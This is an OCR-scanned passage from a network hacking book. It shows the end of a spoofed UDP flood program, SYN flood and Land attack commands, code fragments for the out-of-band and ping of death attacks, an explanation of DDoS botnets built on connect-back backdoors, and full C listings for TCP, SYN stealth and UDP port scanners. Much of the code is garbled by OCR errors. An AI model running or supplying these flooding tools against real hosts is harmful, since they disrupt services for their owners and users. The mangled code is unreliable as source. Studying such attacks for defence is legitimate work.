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dport = atoilargv[4]); /* The victim's port */ 


bzero(&servaddr, sizeof (servaddr)); 
servaddr.sin family = AF INET; 
servaddr.sin port = htons(dport); 
servaddr.sin addr.s addr = dstaddr; 


/* Filling the IP header */ 

ip hdr->ihl = 5; 

ip hdr->version = 4; 

ip hdr->tos = 0; 

ip hdr->tot len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)); 
ip hdr->id = 0; 

ip hdr->frag off = 0; 

ip hdr->ttl = 255; 

ip_hdr->protecol = IPPROTO_UDP; 

ip_hdr->check = 0; 

ip_hdr->check = in_cksum((unsigned short *)ip_hdr, sizeof(struct iphdr)); 


ip_hdr->saddr = srceaddr; 
ip_hdr->daddr = dstaddr; 


/* Filling the pseudo header */ 

pseudo hdr.source address = srcaddr; 

pseudo hdr.dest_address = dstaddr; 

pseudo hdr.place holder = 0; 

pseudo hdr.protocol = IPPROTO_UDP; 

pseudo hdr.length = htons(sizeof(struct udphdr)); 


/* Filling the UDP header */ 

udp hdr->source = htons (sport) ; 

udp hdr->dest = htons(dport); 

udp hdr->len = htons(sizeof(struct udphdr)); 
udp hdr->check = 0; 


/* Allocating memory for formatting a pseudo packet */ 
if ( (pseudo packet = (char*)malloc(sizeof (pseudo hdr) + 
sizeof (struct udphdr))) == NULL) { 
perror("malloc() failed”); 
@xit(-1); 


} 


/* Copying the pseudo header to the start of the pseudo packet */ 
memcpy (pseudo packet, &pseudo hdr, sizeof(pseudo_hdr)); 


/* Copying the UDP header */ 
memcpy (pseudo packet + sizeof(pseudo hdr), sendbuf + 
sizeof(struct iphdr), sizeof(struct udphdr)); 


/* Calculating the UDP header checksum */ 
if ( (udp_hdr->check = in_cksum( (unsigned short *)pseudo_ packet, 
sizeof(pseudo hdr) + sizeof(struct udphdr))) == 0) 


83 


84 _—s— wPaart Il: Network Hacker Tools 


udp hdr->check = Oxffff; 


/* Sending packets in an endless loop */ 
while (1) { 
if (sendto(sd, 
sendbuf, 
sizeof (sendbuf), 
O, 
(struct sockaddr *) &servaddr, 
sizeof (servaddr)) < 0) { 
perror("sendto() failed"); 
exit(—-1); 


i 


return 0; 


6.2. Attacks That Exhaust Host Resources 


6.2.1. SYN Flooding and Land 


In a SYN flooding attack, the attacker tries to make the server to exceed the number of 
in-progress Connections that can be kept open at the same time. When a server receives a TCP 
packet with the Syn flag set at an open port, it replies with a SYN-ACK message and waits for an 
ack reply. While waiting for an ACK message, the server retains the half-open connection and 
adds a new record in the TCP/IP stack. The server will remove the corresponding record if it is 
unable to finish establishing the connection within a certain period. This period varies from 
tens of seconds to tens of minutes depending on the system. Because only a limited number of 
half-open connections can be maintained in the queue, when this number is exceeded the 
server will reject any further connection requests. 

The utility for carrying out a SYN attack is named synflood. I am not giving its source 
code in the book; it can be found in the /PART I]/Chapter 6 directory on the accompanying 
CD-ROM. In many respects, this code is analogous to the source of the attacks from the pre- 
vious section, only here TCP packet fields are filled and sent. As when calculating the UDP 
header checksum, a pseudo header is used for calculating the TCP header checksum (see Sec- 
tion 3.6). 

This utility can also be used to carry out a Land attack. A Land attack sends to the attacked 
host TCP packets with the syn flag set and with the source IP address and port that match 
those of the destination — for example, as follows: 


# gcc synflood.c -o synflood 
# ./Ssynflood 192.168.10.1 80 192.168.10.1 80 
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6.3. Attacks That Exploit Software Bugs 


Software bugs that can crash a host or make it operate erratically occur often. Sometimes, such 
bugs are used by hackers in their DoS exploits (see Section 14.2). DoS exploits, however, as 
a rule crash only a single vulnerable application (e.g., a Web server), not the operating system. 
Bugs in operating systems or in their key components, such as the TCP/IP stack, are not as 
common as they were in the Windows 9x days. Bugs in the key components of that operating 
system were discovered one after another. A remote machine could be crashed or rebooted by 
sending it just a few bytes. At that time, every day was a field day for hackers. In this section, 
I consider vulnerabilities and utilities that are effective only on older operating systems. 
All experiments with these utilities were carried out on Windows 95, which I installed espe- 
cially for this purpose. 

You are probably wondering indignantly, Why should I waste my time learning obsolete 
vulnerabilities? It is important to know old vulnerabilities because history has a tendency to 
repeat itself. For example, many consumer appliances (refrigerators, microwave ovens, wash- 
ing machines, etc.) are now computerized and run under a mini operating system with 
a TCP/IP stack. It is logical, therefore, to expect the same errors to be made in those operating 
systems. Moreover, a modern operating system can harbor an old bug. For example, it would 
seem that the Land attack, considered in the previous section, became a thing of the past along 
with the obsolete operating systems it was developed for. However, quite recently a way of 
carrying out this attack against such modern operating systems as Windows Server 2003 and 
Windows XP Service Pack 2 was discovered. 


6.3.1. Out of Band 


In the out of band (OOB) attack, a TCP packet with the oon flag set is sent to a Windows ma- 
chine with an open TCP port, which is usually port 139. This attack would infallibly crash 
Windows NT and Windows 95 systems until Service Pack 3 was released. 

The source code for a utility implementing the OOB attack (winnuke.c) can be found in 
the /PART I]/Chapter 6 directory on the accompanying CD-ROM. 

The key part of this program is the function for sending data with the Msc_oos flag set 
(the out of band transmission): 

char *str = "Crack"; 

send(sd, str, strlen(str), MSG OOB); 

According to the standard, only 1 byte of string data can be sent. It was the standard’s re- 
quirements that Windows 95 developers relied on, overlooking the situation when more than 
| byte of string data arrive. 


6.3.2. Teardrop 


The teardrop attack takes advantage of the errors in the module responsible for assembling 
fragmented IP packets. All received fragments are assembled in a loop; the information part 
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of the assembled packet is then copied to a buffer, which is then passed to the IP layer for fur- 
ther processing. 

At a glance, the developers did the right thing by implementing a check for fragments that 
were too large. However, they overlooked the possibility of a fragment that was too small be- 
ing copied to the assembly buffer, that is, a fragment of a negative length. 

Suppose that fragment X has the offset of 40 (the Fragment offset field in the IP header 
equals 5) and the length of 200, and that fragment Y has the offset of 80 and the length of 300; 
that is, the fragments overlap, which is allowed. The IP module calculates the part of fragment Y 
that does not overlap fragment X as (80 + 300) — (40 + 200) = 140 and copies the last 140 bytes 
of fragment Y to the assembly buffer. A hacker can build fragment Y to have, for example, the 
offset of 80 and the length of 60. Calculating the overlapping portion gives a negative result: 
(80 + 60) — (40 + 120) = —20. Because of the way negative numbers are represented in ma- 
chine arithmetic, —20 is interpreted as 65,516. The program starts writing 65,516 bytes into the 
assembly butter, overfills it, and overwrites the adjacent memory area as well. 

Thus, in a teardrop attack, packets are constructed in the following way (a two-packet at- 
tack is considered): 


1. A packet that is supposed to be fragmented (the wr flag is set) is sent; the fragment 
offset is 0 and the length of the data block is N. 

2. The last fragment is sent (the mr flag is cleared); the fragment offset is a positive num- 
ber less than N and the data block length is lessthan WN. 

3. Any source address is used for the packets, and they are sent to any port, regar _— dless of 
whether it is open or not. 


There is another variety of the attack, called bonk. In this attack, holes are left in the 
packet after the fragments are assembled, which can also cause malfunctioning of the operat- 
ing system's kernel and hanging of the computer. 

All versions of Windows 95/NT up to Service Pack 4 and early Linux versions (e.g., 
Linux 2.0.0) had both of these vulnerabilities. 

The source codes for teardrop.c and bonk.c can be found in the /PART II/Chapter 6 direc- 
tory on the accompanying CD-ROM. 


6.3.3. Ping of Death 


The total packet length field of the IP packet header is of the unsigned short type (see Sec- 
tion 3.4.2); accordingly, it cannot hold values greater than 65,535. Therefore, the maximum 
length of the entire IP packet can be no more than 65,535 bytes, Because the IP header takes 
from 20 to 60 bytes, the maximum amount of useful data that can be sent in one IP packet is 
65,535 — 20 = 65,515 bytes. 

In a ping of death attack, a hacker sends a fragmented ICMP packet that when assembled 
is larger than the maximum allowed IP-packet size. Some older operating systems did not 
know how to handle this situation and crashed. 
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The source code for a utility implementing this attack (win95ping.c) can be found in the 
/PART II/Chapter 6 directory on the accompanying CD-ROM. 
The key part of this program is the portion that fragments the sent packet (Listing 6.3). 


Listing 6.3. Fraqmenting an ICMP packet in the ping of death attack 


icmp->type = ICMP ECHO; 
icmp->code = 0; 
icmp->checksum = htons(~(ICMP ECHO << 6) ); 


for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { 
ip->ip off = Fix(offset >> 3); 
if (offset < 651270) 
ip->ip off |= FIX(IP_MF); 
else 
ip->ip len = FIX(418); /* Make total 65,538 */ 
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)4&dst, 
sizeof dst) < 0) { 
forintti (stderr, “offset td: ", offset}; 
perror ("sendto"); 


When I tried this attack against Windows 95, the latter continued operating as usual. 
At first, | thought that this was because the win95ping.c program does not calculate the check- 
sum in each of the fragments. I rewrote the program to calculate the checksum, but this did 
not produce the desired results. Then I happened across some information from Russian com- 
puter experts I. D. Medvedskiy, P. V. Semianov, and L. G. Leonov and learned that I was not 
the only one having problems getting the attack work. Here is what they say about the ping of 
death attack: 

We started our testing and, frankly, were not surprised at all when the operating systems un- 
der investigation — IRLX, AIX, VMS, SunOS, FreeBSD, Linux. Windows NT 4.0, and even Win- 
dows 95 and Windows for WorkGroups 3.11 — did not react at all to this type of incorrect request 
and continued normal operation. Then we started looking specifically for an operating system that 
this attack could affect. Such a system turned out to be Windows 3.11 with WinQVT: It did hang. 
Based on our experiments, it can be concluded that the fears of this attack are not based on any 
actual grounds and it is just another programmer myth and should be placed into the category of 
being practically unfeasible. 

Thus, the destructive effects of the ping of death attack have been greatly exaggerated. 


6.4. Distributed DoS 


This book would be incomplete if it did not include description of utilities for carrying out 
distributed DoS (DDoS) attacks. The first DDoS attack was carried out in February 2000 and 
disrupted for several days the operation of many sites known worldwide: Yahoo, eBay, Amazon, 
“ZDNet, Buy, CNN, and many others. 
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Although I had a burning desire to describe a programming implementation of a DDoS 
utility, my better judgment prevailed and I decided to limit the information to only a general 
description of such a utility. However, these utilities are nothing conceptually new: They are 
just a combination of backdoor or Trojan technology and simple DoS utilities, such as those 
considered in this chapter. Therefore, after reading this book you should have no problems of 
constructing such a utility on your own; just be aware of the consequences of taking it public, 

The main difference between a distributed and a nondistributed DoS attack is that a DDoS 
attack is carried out not from a single host, as a nondistributed DoS attack is, but from multi- 
ple hosts simultaneously. Therefore, a DDoS utility consists of two components: a client and 
a server. The server part is a daemon (or a service, in Windows parlance) that executes the 
commands sent to it by the client part. The exact nature of the commands depends on the 
utility's developer, but practically all utilities of this kind offer commands to select the attack 
type (ICMP flooding, smurf, SYN flooding, etc.), commence an attack, and stop the attack. 

The perpetrator needs to install the server part on as many machines as possible. It is not 
necessary to break into each machine; the installation can be done using Trojan programs. 
A machine with a Trojan installed ts called a zombte or bot. 

The usual telnet or netcat utilities can be used as the simplest client. 

The client part can connect to the zombie in different ways. The most common way is for 
each successfully installed Trojan to open a port and inform the hacker (e.g., by sending an 
email) the IP address of the zombie machine. The hacker uses the client part to connect to all 
of the zombies and issues them commands. This method, however, is inefficient because the 
Trojans usually open nonstandard ports and border routers or firewalls often block incoming 
connections on nonstandard ports. Moreover, the client has to establish multiple connections 
to issue a command to each of the zombies, a rather difficult task with several thousand zom- 
bies. Therefore, this connection method is considered obsolete and was used only in early 
DDoS programs. 

Another method of connecting to a zombie is based on using the Internet relay chat (IRC) 
networks. In this case, each installed Trojan is also an IRC bot that connects to an IRC net- 
work, enters a certain channel, and waits for commands from its master. This method is con- 
venient in that all the hacker has to do is log into the necessary channel and issue a command; 
the IRC server does the rest of the job. However, IRC operators can disconnect the perpetra- 
tor’s channel any time they have reason to suspect something is wrong. 

Thus, the most popular way of connecting to a zombie is to have a server that is a con- 
nect-back backdoor and a client part that is a simple text file containing a command. This text 
file can be placed anywhere on the Internet, for example, on some FTP server. At a specified 
time interval, the connect-back backdoor on each of the zombie machines downloads the text 
file with the command and executes it. In this way, to establish a connection, the client and 
the server switch places. Instead of a text file, a script in one of the Web languages, for exam- 
ple, PHP, can be used for the same purpose. In addition to issuing commands to the zombie, 
such scripts can keep statistics. 

The most popular DDoS attack utilities used to be TFN2K, Trinoo, and Stacheldraht. 
Now they are considered obsolete because they use the first method of establishing a connection 
between the client and the zombie. 
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Hackers will scan ports on a host to determine, which of them are in the listening state. 
Because most services use standard ports, this information is usually sufficient to determine 
the services running in the system. For a cracker, active listening services are a potential door- 
way to the system. What can turn this potential doorway into an actual one is an improperly 
configured computer security system or bugs in the system’s software. The most well-known 
and powerful port scanner is nmap by Fyodor, available from http://www.insecure.org/nmap. 
This utility offers about ten scanning modes and has lots of other useful features. Simply type 
nmap -h to see a reference page listing all options. Most of the scanning methods used in the 
utility were developed by Fyodor. 

The essence of all scanning methods comes down to this: The utility sends a packet of 
a certain type to the specified port of the host being explored and, by examining the reply 
from the host, determines whether the port is opened. In this way, all ports in the specified 
address range (if the scanner supports the host range option) are checked. 

I want to emphasize that whenever I say “open port” in this chapter, I mean a port that 
is in the listening state. A port that is simply open is not necessarily in the listening state; 
for example, this happens when ports are dynamically assigned in outgoing connections. 
It is ports that are in the listening state that a port scanner detects. Such ports are opened by 
server applications (1.€., services or daemons). 

This chapter considers individual implementation of all main port scanning methods. 
Once you understand the operation mechanism of each method, you will be able to combine 
them into a single utility on your own. The source codes for all programs in this section can be 
found in /PART II/Chapter 7 directory on the accompanying CD-ROM. 
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7.1. TCP Connect Scan 


The TCP connect scan is the simplest scan method, and it was used in the first port scanners. 
The source code for a program implementing a port scanner based on this method is shown in 
Listing 7.1. A TCP connect port scanner attempts to establish a TCP connection to each port 
under investigation following the complete procedure: a three-stage handshake, during which 
SYN, SYN/ACK, and ACK messages are exchanged between the client and the server. This type of 
connection is established using the connect () function, employed in the custom port scanner 
under consideration. If the connect () function returns 0, it means that the connection 
was established successfully; that is, the port is in the listening state. In this case, the 
getservbyport () function is called, which returns information about the service running on 
the given port. This function returns a servent type structure, whose s_name field contains 
the official name of the service. A 0 returned by the function means that it could not determine 
the service by the port number. In this case, (unknown) is output for the particular port number. 

The following arguments must be passed to the scanner in the command line: the address 
of the probed host and the starting and the ending number of the port range to probe. 

The program is compiled as usual: 

& gcc tcpscan.c -o tepscan 

Running the program and viewing the results occurs as follows: 

# ./tepscan 192.168.10.1 0 10000 

Running scan... 

Open: 680 (http) 

Open: 135 (unknown) 

Open: 139 (netbios-ssn) 

Open: 445 (microsoft-ds) 

i 





Listing 7.1. A TCP connect port scanner (tcpscan.c) 





#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <sys/socket .h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <string.h> 


int main(int argc, char *argv[]) 
i 
int sd; 
struct hostent* hp; 
struct sockaddr in servaddr; 
struct servent *srvport; 
int port, portlow, porthigh; 


if {arge != 4) { 
fprintf(stderr, "Usage: #5 <address> <portlow> <porthigh>\n", 
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argv[0)); 
exit (-L); 


hp = gethostbyname (argv[1]); 

if (hp == NULL} { 
herror("gethostbyname() failed"); 
exit{-1); 


portlow = atoi(argv[2]); 
porthigh = atoi(argv[3]); 


fprintfi (stderr, "Running scan...\n"); 


for (port = portlow; port <= porthigh; port++) 


if { (sd = socket (PF_INET, SOCK_STREAM, 0)) < 0) { 
perror("socket() failed"); 
exit(-1); 

} 


bzero(&servaddr, sizeof(servaddr)); 

servaddr.sin family = AF_INET; 

servaddr.sin_ port = htons (port); 

servaddr.sin_addr = *((struct in_addr *)hp->h_addr); 


if (connectisd, (struct sockaddr *)é&servaddr, sizeof(servaddr)) == 0) 
{ 
srvport = getservbyport (htons(port), “"tep™); 
1f (srvport == NULL) 
Pprintt("Open: $d (unknown) \n", port); 
else 
printf("Open: ¢d (%s)\n", port, srvport->s_name); 
tflush (stdout) ; 
} 
close (sd); 
} 
printt("\n"); 


return 0; 





7.2. SYN, FIN, Xmas, Null, and ACK Scans 


I consider in detail TCP SYN scan first and then describe the FIN, Xmas, Null, and ACK scans. 
The programming approaches to implementing all of these methods are similar. 

The TCP scan is also called half-open scanning because it does not open a complete TCP 
connection. The process is started as usual by sending a SYN message and waiting for the reply. 
If the remote machine responds with SyN/AcK, you know that the given port is in the listening 
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state. Because this is the piece of information you are interested in, you don’t have to proceed 
with opening a full connection; instead, you send the remote machine a RST/ACK message to 
tear down the nascent connection. Many systems do not log such unfinished connections, 
so it gives scanning a certain degree of stealth. The source code for a program implementing 
a stealth port scanner is shown in Listing 7.2. 

The connect () function cannot be used because it opens a full connection; thus, the only 
way to proceed is to fill the TCP header yourself (actually, to let the IP subsystem do this) and 
send the packet. The TCP header checksum is calculated using a pseudo header (see Section 3.6). 
In the pseudo header, the source IP address field (unsigned int source address) must be 
filled. To save the user the trouble of specifying the local IP address, it is determined pro- 
grammatically using the following code: 

#define DEVICE "etho" 

Struct ifreq *ifr; 

Struct sockaddr in source; 


/* Obtaining the IP address of the interface and placing it into the 

source address structure */ 

sprintf (ifr->ifr name, "45", DEVICE); 

ioctl (sd, SIOCGIFADDR, ifr); 

memcpy ((char*)&source, (char*)&{ifr->ifr addr), sizeof(struct sockaddr) ); 

The IP address of the et nO interface is determined in this case, but other interfaces (pppo, 
le0, 100, etc.) can be active in a real-world situation. Therefore, a full-fledged scanner should 
obtain a list of all interfaces first. This task can be accomplished by calling the ioct1() 
function with the SIOCGIFCONF parameter. 

In the header of the outgoing TCP packet, the Syn flag is set (tcp hdr.syn = 1), and in the 
received packet, the SYN and ACK (tcphdr->syn == 1 && tephdr->ack == 1) flags are checked. 
If both of the latter flags are set, the given port is in the listen state. To separate the packets addressed 
for the desired process, the PID of the current process is entered into the source port number field 
in the TCP header of the outgoing packets (tcp hdr.source = getpid()) and checks this value 
in the received packets (tcphdr->dest == getpid() ). Note that in the received packet, the desti- 
nation (dest) and not the source (source) port number field is checked. 


Listing 7.2. A TCP SYN (stealth) port scanner (halfscan.c) 


finclude <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
f#include <sys/types.h> 
#include <sys/socket.h> 
#include <net/if.h> 
#include <linux/ip.h> 
#include <linux/tcp.h> 
#include <netdb.h> 
#include <sys/Loctl,h> 


#define DEVICE "etho" 


jf 
f* 
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Calculating the checksum */ 


unsigned short in cksum(unsigned short *addr, int len) 


{ 


unsigned short result; 
unsigned int sum = 0; 


/* Adding all 2-byte words */ 
while (len > 1) { 
sum += *addr++; 
len -= 2; 
} 
/* If there is a byte left over, adding it to the sum */ 
1f (len = 1) 
sum += *(unsigned char*) adder; 


sum (Sum >> 16) + (sum & OXFFFF); /* Adding the carry */ 


sum += (sum >> 16); /* Adding the carry again */ 
result = ~sum; /* Inverting the result */ 


return result; 


Se *} 


/* Assembling and sending a packet */ 
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send packet (int sd, unsigned short port, struct sockaddr_in source, struct hostent* hp) 


{ 


struct sockaddr_in servaddr; 
struct tephdr tcp hdr; 


/* Pseudo packet structure */ 

struct pseudo hdr 

{ 
unsigned int source address; 
unsigned int dest_address; 
unsigned char place holder; 
unsigned char protocol; 
unsigned short length; 
struct tcphdr tcp; 

} pseudo hdr; 


bzero(&servaddr, sizeof (servaddr) ); 
servaddr.sin_family = AF INET; 

servaddr.sin port = htons(port); 

servaddr.sin addr = *((struct in addr *)hp->h_addr); 


/* Filling the TCP header */ 

tcp hdr.source = getpid(); 

tcp hdr.dest = htons (port); 

tcp hdr.seq = htons(getpid() + port); 
tcp hdr.ack_ seq = 0; 
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tcp hdr.resl = 0; 
tcp hdr.doff = 5; 
tcp _hdr.fin = 0; 
tcp hdr.syn = 1; 
tcp_hdr.rst = 0 
tcp hdr.psh = 0 
tcp hdr.ack = 0 
tcp_hdr.urg = 0 
tcp hdr.ece = 0 
tcp_hdr.cwr = 0 
tcp_hdr.windew = htons (128); 
tcp hdr.check = 0; 

tcp _hdr.urg ptr = 0; 


a ae Ss Se Be Be 


/* Filling the pseudo header */ 
pseudo hdr.source address = source.sin_addr.s_addr; 
pseudo hdr.dest_, address = servaddr.sin addr.s addr; 


pseudo hdr. place holder = 0; 
pseudo_hdr.protocol = IPPROTO_TCP; 
pseudo hdr.length = htons (sizeof (struct tcphdr) }; 


/* Pasting the filled TCP header after the pseudo header */ 
beopy (&tcp hdr, &pseudo hdr.tcp, sizeof (struct tcphdr) }; 


/* Calewulating the TCP header checksum */ 
tcp hdr.check = in_cksum( (unsigned short *)4pseudo hdr, sizeof(struct pseudo_hdr)); 


/* Sending the TCP packet */ 
if (sendto(sd, 
&tcp hdr, 
Sizeof(struct tephdr), 
0, 
(struct sockaddr *)&servaddr, 
sizeof (servaddr)) < 0) 
perror("sendto() failed"); 


ftw rr rt rr =f 
i* peer y the reply packet and checking the flags od 
j*<------ a a a i a a a * if 


int rene paeNER EH sd) 
{ 
char recvbuf[1500); 
struct tephdr *tcphdr = (struct tephdr *) (recvbuf + 
sizeof (struct iphdr)); 


while (1) 
{ 
if (recvi(sd, recvbuf, sizeof(recvbuf}), 0) < 0) 
perror("recv() failed"); 


if (tephdr->dest == getpid()) { 
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if(tephdr->syn == 1 £& tephdr->ack = 1) 


return 1; 
else 
return 0; 
} 
} 

I 
j* ae ee ee ee * 
/* The main() function */ 
f* eo ee eae ee xf 


int main(int argc, char *argv[]) 
{ 
int sd; 
struct ifreq *ifr; 
struct hostent* hp; 
int port, portlow, porthigh; 
unsigned int dest; 
Struct sockaddr_in source; 
Struct servent* srvport; 


if {arge != 4) { 
fprintf(stderr, “Usage: #8 <address> <portlow> <porthigh>\n", 
argv[0)); 
exit (-1); 
} 


hp = gethostbyname (argv[1]); 

if (hp == NULL) { 
herror("gethostbyname() failed"); 
exit (<1); 

} 


portlow = atoil{argv[2]); 
porthigh = atoi(argv[3]); 


if( (sd. = socket (PF_INET, SOCK RAW, IPPROTO TCP)) < 0) { 
perror("socket({) failed"); 
exit (-1); 

} 


fprintf(stderr, "Running scan...\n"); 


/* Obtaining the IP address of the interface and placing it into the 
source address structure */ 


sprintf (ifr->ifr_name, "ts", DEVICE); 

ioctl (sd, SIOCGIFADDR, ifr); 

memcpy ((char*)&source, (char*)&(ifr->ifr_addr), 
sizeof(struct sockaddr) ); 


for (port = portlow; port <= porthigh; portt++) { 
send packet(sd, port, source, hp); 
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if (recy packet(sd) == 1) { 
sryvport = getservbyport (htons (port), “tcp"); 
if (srvport == NULL) 
printf ("Open: #d (unknown) \n", port); 
else 


printf ("Open: td (%s)\n", port, srvport->s_name); 


fflush (stdout) ; 
} 
} 


close (sd); 
return O; 
} 


The essence of the other TCP scans amounts to the following: 


O TCP FIN scan. A FIN packet is sent to the probed host. Pursuant to RFC 793, the host 
must reply with an RST packet for closed ports. No RST reply to a FIN message means that 
the particular port is closed. This method cannot be used against Windows systems, 
because, as usual, Microsoft went its own way and its operating systems do not respond 
with RST. 

TCP Xmas scan. A packet with the FIN|URG| PUSH flags set is sent to the probed host. 
Pursuant to RFC 793, the probed host must reply with an RST message for all closed ports. 

O TCP null scan. The host is probed with packets with all of the flags cleared. Pursuant to 
RFC 793, the probed host must reply with an RST message for all closed ports. 

O TCP ACK scan. This method makes it possible to determine whether a port is protected 
with a firewall, An ACK packet is sent to the probed host. An RsT reply packet classifies the 
port as unfiltered by a firewall. Any other reply places the port into the filtered category. 


As you can see, all of the preceding scans are implemented as shown in Listing 7.2. 
The only differences are the flags set in the outgoing packets and the flags examined in the 
received packets. All of these methods can be combined into one utility, and the needed one 
can be specified with a command-line option, the way the nmap utility does it. 


7.3. UDP Scan 


As is well known, both TCP and UDP services can use the same port number, for example, 
www-http 80/tcp and 80/udp. Thus, a TCP scan cannot determine a listening UDP port. 
This situation calls for a UDP port scanner. The source code for such a scanner is shown 
in Listing 7.3. In general, only one UDP scanning method is used: A UDP packet is sent to 
each port of the host under investigation and the reply is examined. The ICMP “port unreach- 
able” reply means that the port is closed. No reply means that the port is open. Because the 
scanner has to wait a certain time for the ICMP reply, UDP scanning is much slower than any 
of the TCP scan methods. Moreover, because routers usually block ICMP “port unreachable” 
messages, this UDP scanning method often produces false results. 
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Some UDP scanners use a more reliable and faster scanning technique consisting of querying 
remote UDP services for answers. This, however, requires you to know how to generate a proper 
query and how to receive answers from each UDP service. This method is beyond the scope of 
this book; however, you should be able to implement it on your own. All it takes is to discover 
the necessary information about how each UDP service operates, which can be found in the cor- 
responding documentation. 

The UDP scanner shown in Listing 7.3 creates two sockets: one a datagram socket for 
sending UDP packets and the other a raw socket for receiving ICMP replies. UDP packets are 
sent to a specific port by the send packet () function, with the data field in each packet filled 
with the "Regards from Ivan Sklyaroff!" phrase instead of no data, which is what most 
UDP scanners send in this field. The reply packets are received by the recv packet () func- 
tion. Because the scanner needs some time to wait for the ICMP reply to arrive, a 1-second 
delay is built into the recv_function() with the help of the select () function and the 
FD ZERO and FD SET macros. This solution, however, is not efficient, because 1 second may be 
not enough to receive the ICMP reply or, on the contrary, may be too much and will slow the 
scanner unnecessarily. Thus, many scanners, nmap in particular, determine the transmission 
speed of the ICMP messages and adjust the delay accordingly. The transmission speed can 
be determined as it was done in the ping and traceroute utilities (see Chapters 4 and 5): 
The current system time is determined using the gettimeofday() function and Is saved in the 
data field of an ICMP echo request packet, which is subsequently sent. When the echo reply is 
received, the current system time is determined again, and the difference between the current 
system time and the time saved in the packet will be the round-trip time sought. To add this 
capability to your program, you will have to use a raw socket not only to receive but also to 
send ICMP messages. 

The recv packet () function also parses the headers of each received ICMP packet to de- 
termine whether the ICMP “port unreachable” message or some other message was received. 





Listing 7.3. A UDP port scanner (udpscan.c) 





finclude <stdio.h> 

#include <stdlib.h> 

#include <sys/socket.h> 
#include <sys/types.h> 
#include <sys/time.h> 
#include <netinet/ip.h> 
#include <netinet/ip icmp.h> 
finclude <netdb.h> 

#include <unistd.h> 

#include <strings.h> 


send packet (int sendsock, unsigned short port, struct hostent* hp) 
{ 

struct sockaddr in servaddr; 

char sendbuf[] = "Regards from Ivan Sklyaroff!"; 


bzero(&servaddr, sizeof (servaddr)); 
servaddr.sin family = AF INET; 
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servaddr.sin_port 
servaddr.sin addr 


htoens (port); 
*((struct in_addr *)hp->h_addr}); 


i 


if (sendto(sendsock, sendbuf, sizeof(sendbuf), 0, 
(struct sockaddr *)&servaddr, sizeof(servaddr)) < 0) { 
perror ("sendto() failed"); 
} 
} 


recv_ packet (int recvsock} 
{ 
unsigned char recvbuf[1500]; 
struct icmp ‘icmp; 
struct ip *iphdr; 
int iplen; 
fd set fds; 
struct timeval wait; 


Wait.tv_sec = 1 
wait.tv_usec = 


> 
a 


white (1) 
FD Z2ERO(&tds); 
FD SET(recvsock, &fds); 


if (select(recvsock + 1, &fds, NULL, NULL, éwait) > 0) { 
recvfrom(recvsock, &recvbuf, sizeof(recvbuf), 0x0, NULL, NULL); 
} else if (!FD_ISSET(recvsock, 4fds)) 
return 1; 
else 
perror("recvirom() failed"); 


iphdr = (struct ip *)recvbuf; 
iplen = iphdr->ip hl << 2; 


iemp = {struct icmp *) (recvbuf + iplen); 


if ( (iemp->icmp_type == ICMP UNREACH) && 
{icmp->icmp code == ICMP UNREACH PORT) } 
return OQ; 


| 


int main(int argc, char *argv[]) 
int sendsock, recvsock; 
int port, portlow, porthigh; 
struct hostent* hp; 
unsigned int dest; 
struct servent* srvport; 


if (argc != 4) [{ 
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fprintfistderr, “Usage: *s <address> <portlow> <porthigh>\n", 
argv[0]); 
exit (-1); 


hp = gethostbyname (argv[1]); 

if (hp == NULL) { 
herror ("gethostbyname () failed"); 
exit({-1)}; 


portlow = atoilargv[2]); 
porthigh = atoi(argv[3])}; 


ba 
rr, 


(sendsock = socket (AF_INET, SOCK _DGRAM, IPPROTO_UDP)) < 0) { 
perror("sendsock failed"); 
exit (-1); 


if { (recvsock = socket (AF INET, SOCK RAW, IPPROTO_ICMP)} < 0) { 
perror("recvsock failed"); 
exit(=-L); 

} 


fprintf(stderr, "Running scan...\n"); 


for (port = portlow; port <= porthigh; port++) { 
send packet (sendsock, port, hp); 
if (recy_packet(recvsock) == 1) | 
srvport = getservbyport (htons(port), "“udp"); 
if (srvport = NULL) 
printf ("Open: td (unknown) \n", port); 
else 
printf("Open: td (%s)\n", port, srvport->s name); 


fflush (stdout); 


return O; 


7.4. Multithreaded Port Scanner 


Program performance can be enhanced by different methods, one of which is adding multi- 
threading support. Later in this section, Listing 7.4 shows the source code for the TCP connect 
port scanner, considered in Section 7.1, with multithreading support added. The program is 


compiled as usual: 


# gcc ptscan.c -o ptscan -lpthread 


99 
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When running the modified scanner, the number of threads to create is passed to it in the 
fourth command line parameter: 
# ptscan 192.168.10.1 1 10000 20 


This command tells the utility to scan ports 1 through 10,000 on host 192.168.10.1 in 
20 threads. You can display a list of the running threads by executing the ps -a command in 
another terminal on the same machine, The ps command is supposed to show running proc- 
esses, but in Linux the pthread_create() function actually creates a new process that exe- 
cutes a thread (this, however, is not the same type of a process that the fork () function cre- 
ates). So this is why the ps command shows threads. Note the even though 20 threads were 
specified in the command line, the ps command actually shows 22 of them. The 2 “extra” 
threads are the main program thread and the controlling thread, which is a part of the internal 
Linux implementation mechanism. 

Implementing the multithreaded port scanner is quite simple. In the main () function, the 
pthread create() function is run in a loop to create the required number of threads. Each 
created thread runs the scan() function, into which the first command-line argument is 
passed (argv{1)). Ina similar loop, the pthread join() function is run, which waits for each 
thread to terminate executing. The scan() function converts the address of the remote host, 
fills the address structure, creates a socket, and connects to the specified port with the help of 
the connect () function. It then examines the result returned by the connect () function to 
determine whether or not the port is in the listening mode (see Section 7.1 ). 

| have seen numerous multithreaded programs, in which each thread is unloaded after the 
function’s execution and a new thread is loaded in its place, thereby maintaining the specified 
number of threads. This is not the approach taken in this multithreaded port scanner. Here, 
threads are created when the scanner starts executing and are not unloaded while there are 
unscanned ports left — in essence, until the scanner’s execution terminates. This is achieved 
by storing the port number (port) in a global variable, which is incremented in each stream. 
That the maximum port value has been reached is checked in the while (port < porthigh) 
loop, which is also executed in each thread. 

Because the system can give the processor to any of the threads at anytime in any part of 
the code, the port scanner may not work as intended. For example, two threads may incre- 
ment the global variable port and a third thread may use the obtained value to connect to the 
remote port. To avoid this undesirable development, threads are synchronized using a mutual 
exclusion (mutex) object. The portion of the program, in which simultaneous access by 
threads may cause faulty execution (the critical section), is delimited as follows: 

/* Critical section start */ 

pthread mutex lock(&lock) ; 


pthread mutex unlock (é&lock); 
* Critical section end */ 

